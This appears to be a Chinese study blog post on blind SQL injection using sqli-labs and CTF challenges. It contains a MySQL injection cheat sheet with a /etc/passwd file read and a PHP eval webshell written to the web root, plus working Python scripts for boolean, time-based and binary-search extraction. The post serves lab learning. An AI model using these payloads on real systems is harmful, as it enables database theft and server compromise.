盲注学习

盲注学习

五月 07, 2022

sqli-labs

搭建

https://hub.docker.com/r/acgpiano/sqli-labs

docker pull acgpiano/sqli-labs
docker run -dt --name sqli-lab -p [PORT]:80 acgpiano/sqli-labs:latest
docker exec -it bin/sh
实时更新日志文件 tail -f access.log
当前用户:select user()
数据库版本:select version() , select @@version
数据库名:select database()
操作系统:select @@version_compile_os
所有变量:show variables
单个变量:select @@secure_file_priv , show variables like 'secure_file%'
爆字段数:order by 1... ,group by 1...
查库名:select group_concat(schema_name) from information_schema.schemata
查表名:select group_concat(table_name) from information_schema.tables where table_schema='库名'
查字段:select group_concat(column_name) from information_schema.columns where table_name='表名'
读取某行:select * from mysql.user limit n,m // limit m offset n (第n行之后m行,第一行为0
读文件:select load_file('/etc/passwd')
写文件:select '<?php @eval($POST[a]);?>' into outfile '/var/www/html/a.php' //该处文件名无法使用16进制绕过

DATABASE() 函数返回当前数据库(即默认数据库)的名称。如果要查询的表不在默认数据库内,需要在表名前面加上数据库名称。

information_schema 是 MySQL 自带的一个数据库,它保存了 MySQL 服务器上所有数据库的信息,如数据库名、数据库中的表、表列的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,其中有 table_name 和 table_schema 两个字段,分别记录 DBMS 中存储的表名和该表所在的数据库。

Page 1

个人理解:先进行正常查询,如果有正确回显,则尝试在查询后跟随 ‘ “ 等符号,导致报错的即为闭合符号。

Less - 1/2(无单引号)/3( ‘) )/4( “ )

首先尝试单双引号

首先 联合注入 
?id=-1%27union%20select%201,2,3--+ 、//发现只有2 3 能显示
?id=-1%27union%20select%201,database(),3--+ security
?id=-1%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3--+
emails,referers,uagents,users
?id=-1%27union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),3--+
id,username,password
?id=-1'union select 1,(select group_concat(username) from security.users), (select group_concat(password) from security.users)--+

Less - 5/6(“ 闭合)

初学 bool 盲注时遇到了很多奇奇怪怪的错误。

最常见的错误就是 substr((select ...)) 中的子查询要有两对括号。

1x 师傅给的脚本比较容易看懂,初学者可以研究一下。

?id=1%20and%20length(database())=8%20--+
?id=1%27%20and%20substr((select%20database()),1,1)=%27s%27%20--+
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:1x
# datetime:2022/4/23 23:38
# software: PyCharm
# Boolean-based blind SQL injection lab script (sqli-labs Less-5).
# The server never echoes the query result; each request instead asks one
# yes/no question ("is character i of database() equal to X?") and the answer
# is read from whether the normal page text ('are') is present.
# Defender's view: the root cause is the unparameterised id parameter; the
# visible symptom in logs is a burst of near-identical GETs that differ only in
# small numeric literals inside ascii(substr(...)).

import sys  # imported but not used in this script
import requests, time
# Candidate alphabet tried at each position (letters, digits, ',', '-', '{', '}').
d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890,-{}'

# Lab instance URL; '{}' is replaced with the probe value (a literal '1' plus the payload).
url="http://49.235.100.251:10086/Less-5/?id={}"
# %s placeholders: (1) 1-based character position, (2) expected ASCII code.
payload = "' and ascii(substr((select database()),%s,1))=%s --+"
# Table-name variant; defined here but not sent by this script.
payload1 = "' and ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=),%s,1))=%s --+"

database=''
print("Start to retrive the database")
# Positions 1..8: the length of the database name is hard-coded here.
for i in range(1, 9):
    for ii in d:#range(32, 127):
        # '%' binds tighter than '+': the payload is formatted first, then prefixed with '1'.
        response = requests.get(url.format('1'+payload % (i, ord(ii))))
        time.sleep(0.1)  # crude pacing between probes
        #print(response.text)
        # Oracle: the normal page contains 'are' only when the injected condition is true.
        if 'are' in response.text:
            database+=ii#chr(ii)
            break
        else:
            pass
        #response.close()
print("the database is :%s" % database)
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/4/29 23:54
# software: PyCharm
# Boolean-based blind injection, second version: first determine the length of
# the target string (leng), then brute-force each character with a linear scan
# over ASCII codes 1..126 (BA). Same content oracle ('are') as the script above.

import requests , time

# Lab instance; each probe string is appended directly to the id parameter.
url="http://49.235.100.251:10086/Less-5/?id="
def leng(url: str):
    """Return the length of the probed string as a decimal string.

    Probes ``length(...) = i`` for i in 1..99 and stops at the first value the
    boolean oracle confirms. Only ``payload1`` (table names of the 'security'
    schema) is sent; ``payload`` is kept for reference. If no length in range
    matches, the loop falls through and the function returns None, which makes
    the ``int(leng(url))`` call in BA raise TypeError.
    """
    database = ''
    payload = "1' and length((select database())) = {} --+"
    payload1 = "1' and length((select group_concat(table_name) from information_schema.tables where table_schema= 'security')) = {} --+"
    for i in range(1,100):
        response = requests.get(url + payload1.format(i))
        #print(response.text)
        # Oracle: 'are' appears in the normal response only when the condition holds.
        if 'are' in response.text:
            database+= str(i)
            return database
        else:
            pass

def BA(url: str):
    """Recover the probed string one character at a time.

    For each position, tries ASCII codes 1..126 in order and appends the first
    one the oracle confirms. Progress is printed; nothing is returned, so the
    caller's ``print(BA(url))`` prints None at the end. Cost is up to 126
    requests per character, which is what makes this pattern conspicuous in
    access logs.
    """
    bala = ''
    payload = "1' and ascii(substr((select database()),{},1)) = {} --+"
    payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'security'),{},1)) = {} --+"
    #n = int(leng(url))
    # MySQL substr positions are 1-based; the i = 0 pass yields '' (ascii 0) and can never match.
    for i in range(0, int(leng(url)) +1):
        for j in range(1,127):
            response = requests.get(url + payload1.format(i,j))
            if 'are' in response.text:
                bala += chr(j)
                print(bala)
                print(i)
                break
            else:
                pass

# Entry point: BA() prints its own progress and returns None, so the final
# line of output is 'None'.
print(BA(url))
#print(leng(url))
1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)
-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security')),1)
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/2 18:45
# software: PyCharm
# Time-based blind injection: the oracle is no longer page content but response
# latency. A true condition triggers sleep(5) on the server and the client
# treats a round trip above 1 s as "true".
# Defender's view: the HTTP response body is identical either way, so
# content-based detection does not help; look for sleep()/benchmark() in query
# strings and for response times clustered around the sleep value.
import requests , time
# several alternative payload phrasings
url="http://49.235.100.251:10086/Less-5/?id="
def leng(url: str):
    """Return the length of the probed string as a decimal string (time oracle).

    Sends ``payload1`` for i in 1..99 and measures the wall-clock round trip; a
    delay above 1 s (server-side sleep(5)) is taken as a match. ``payload`` and
    ``payload2`` are alternative phrasings kept for reference. Falls through and
    returns None if no length in range matches. Any ordinary response slower
    than 1 s (network jitter, a loaded server) is misread as a match.
    """
    database = ''
    payload2 = "1' and length((select database())) = {} and if(1=1,sleep(5),1)--+"
    payload = "1' and if(length((select database())) = {} , sleep(5) , 1 )--+"
    payload1 = "1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema= 'security')) = {} , sleep(5) , 1 ) --+"
    for i in range(1,100):
        F__ktime = time.time()
        response = requests.get(url + payload1.format(i))
        #print(response.text)
        # Oracle: the request took longer than 1 s -> the condition was true.
        if time.time() - F__ktime > 1:
            database+= str(i)
            return database
        else:
            pass

def BA(url: str):
    """Recover the probed string character by character using the time oracle.

    For each position 0..n tries ASCII codes 1..126 and appends the first one
    whose request takes more than 1 s. Prints progress; returns None.
    The ``response`` object is only kept for the timing side effect.
    """
    bala = ''
    payload = "1' and ascii(substr((select database()),{},1)) = {} and if(1=1,sleep(5),1)--+"
    payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'security'),{},1)) = {} and if(1=1,sleep(5),1)--+"
    n = int(leng(url))
    # MySQL substr positions are 1-based; the i = 0 pass yields '' and cannot match.
    for i in range(0,n+1):
        for j in range(1,127):
            F__ktime = time.time()
            response = requests.get(url + payload1.format(i,j))
            # Oracle: elapsed time above 1 s means the injected condition held.
            if time.time() - F__ktime > 1:
                bala += chr(j)
                print(bala)
                #print(i)
                break
            else:
                pass

# Entry point: BA() prints its own progress and returns None.
print(BA(url))
#print(leng(url))

Ctfshow web174 二分法盲注

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/3 16:10
# software: PyCharm
# Binary-search variant of the boolean blind injection (ctfshow web174): each
# probe asks "is the value > mid?", so a length or character is pinned down in
# about log2(range) requests instead of a linear scan. The oracle word here is
# 'admin' (presumably a row rendered only when the condition is true).
import requests , time

# Challenge instance; each probe string is appended directly to the id parameter.
url="http://143125bc-9b73-4ce2-b828-243c998d121b.challenge.ctf.show/api/v4.php?id="
def leng(url: str):
    """Return the length of the probed string as a decimal string.

    Binary search over (0, 500]: probes ``length(...) > mid``; a true answer
    ('admin' in the page) raises the lower bound, a false one lowers the upper
    bound. The loop ends when max == min + 1, at which point max is the length.
    Only ``payload4`` is sent; payload..payload3 are the earlier enumeration
    steps kept for reference.
    """
    database = ''
    payload = "1' and length((select database())) > {} --+"
    payload1 = "1' and length((select group_concat(table_name) from information_schema.tables where table_schema= 'ctfshow_web')) > {} --+"
    payload2 = "1' and length((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user4')) > {} --+"
    payload3 = "1' and length((select group_concat(username) from ctfshow_user4)) > {} --+"
    payload4 = "1' and length((select group_concat(password) from ctfshow_user4 where username='flag')) > {} --+"
    # NOTE: max/min shadow the builtins of the same name (local to this function).
    max = 500
    min = 0
    mid = (max + min) // 2
    while max > min + 1:
        response = requests.get(url + payload4.format(mid))
        if 'admin' in response.text:
            min = mid  # length > mid
        else:
            max = mid  # length <= mid
        mid = (max + min) // 2
    database += str(max)
    return database

def BA(url: str):
    """Recover the probed string character by character with a binary search.

    For each position 1..n, searches the ASCII range (32, 127] with the same
    ``> mid`` oracle as ``leng``; the final ``max`` is the character code.
    Prints progress; returns None.
    """
    bala = ''
    payload = "1' and ascii(substr((select database()),{},1)) > {} --+"
    payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'ctfshow_web'),{},1)) > {} --+"
    payload2 = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user4'),{},1)) > {} --+"
    payload3 = "1' and ascii(substr((select group_concat(username) from ctfshow_user4),{},1)) > {} --+"
    payload4 = "1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),{},1)) > {} --+"

    n = int(leng(url))
    print(n)
    for i in range(1, n + 1):
        # NOTE: max/min shadow the builtins of the same name (local to this function).
        max = 127
        min = 32
        mid = (max + min) // 2
        while max > min + 1:
            response = requests.get(url + payload4.format(i, mid))
            if 'admin' in response.text:
                min = mid  # ascii > mid
            else:
                max = mid  # ascii <= mid
            mid = (max + min) // 2
        bala += chr(max)
        print(max)
        print(bala)
        print(i)
# Entry point: BA() reports progress via its own print calls.
BA(url)
#print(leng(url))

BUU babysql:函数和比较符被过滤时,如何构造二分法脚本

本题目原本考的是 replace 过滤后的联合注入,‘>’ 也被过滤,但真的就没有办法使用二分法了么?

greatest(n1, n2, n3, …) 函数返回其输入参数 (n1, n2, n3, …) 中的最大值。

利用该函数绕过对 > 的过滤,从而构造出二分法所需的判断条件。

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/6 22:27
# software: PyCharm
# Binary search when '>' and common keywords are removed by a single-pass
# replace() filter: greatest(x, mid) = mid is equivalent to x <= mid, and
# doubled keywords (seselectlect -> select) survive one replacement pass.
# Defender's view: this is exactly why denylist/replace filtering is not a
# SQL injection defence; parameterised queries are.
import requests , time
# union > from or where information(or) ascii substr greatest -- the filter strips all of these
url="http://b83510ca-eaf7-49f5-ac8f-e77cbf40f2df.node4.buuoj.cn:81/check.php?username="
def leng(url: str):
    """Return the length of the probed string as a decimal string.

    Binary search over (0, 127]: ``greatest(length(...), mid) = mid`` holds
    iff length <= mid, so a true answer ('admin' in the page) lowers the upper
    bound -- the branches are the inverse of the ``>`` version above. Both
    ``{}`` slots receive ``mid``. Only ``payload3`` is sent; payload..payload2
    are the earlier enumeration steps kept for reference. The trailing
    ``&password=1`` supplies the form's second field in the same query string.
    """
    database = ''
    payload = "1' || greagreatesttest(length((seselectlect group_concat(schema_name) frfromom infoorrmation_schema.schemata)),{}) = {} -- &password=1"
    payload1 = "1' || greagreatesttest(length((seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema= 'ctf')),{}) = {} -- &password=1"
    payload2 = "1' || greagreatesttest(length((selselectect group_concat(column_name) frorom infoorrmation_schema.columns whewherere table_name='Flag')),{}) = {} -- &password=1"
    payload3 = "1' || greagreatesttest(length((selselectect concat(flag) frorom ctf.Flag)),{}) = {} -- &password=1"
    # NOTE: max/min shadow the builtins of the same name (local to this function).
    max = 127
    min = 0
    mid = (max + min) // 2
    while max > min + 1:
        response = requests.get(url + payload3.format(mid,mid))
        #print(response.text)
        if 'admin' in response.text:
            max = mid  # length <= mid
        else:
            min = mid  # length > mid
        mid = (max + min) // 2
    database += str(max)
    return database


def BA(url: str):
    """Recover the probed string character by character with a binary search.

    For each position 1..n, searches ASCII codes (0, 127] using the same
    ``greatest(..., mid) = mid`` (i.e. ``<= mid``) oracle as ``leng``; the
    final ``max`` is the character code. Pauses 0.1 s between probes, prints
    progress, returns None.
    """
    bala = ''
    payload = "1' || greagreatesttest(asasciicii(subsubstrstr((seselectlect group_concat(schema_name) frfromom infoorrmation_schema.schemata),{},1)),{}) = {} -- &password=1"
    payload1 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='ctf'),{},1)),{}) = {} -- &password=1"
    payload2 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect group_concat(column_name) frorom infoorrmation_schema.columns wheorre table_name='Flag'),{},1)),{}) = {} -- &password=1"
    payload3 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect concat(flag) frorom ctf.Flag),{},1)),{}) = {} -- &password=1"
    n = int(leng(url))
    print(n)
    for i in range(1,n+1):
        # NOTE: max/min shadow the builtins of the same name (local to this function).
        max = 127
        min = 0
        mid = (max + min )//2
        while max > min + 1 :
            time.sleep(0.1)  # pacing between probes
            response = requests.get(url + payload3.format(i,mid,mid))
            #print(response.text)
            if 'admin' in response.text:
                max = mid  # ascii <= mid
            else:
                min = mid  # ascii > mid
            mid = (max + min) // 2
        bala += chr(max)
        print('database=====>',bala)
        print(i)
# Entry point: BA() reports progress via its own print calls.
BA(url)
#print(leng(url))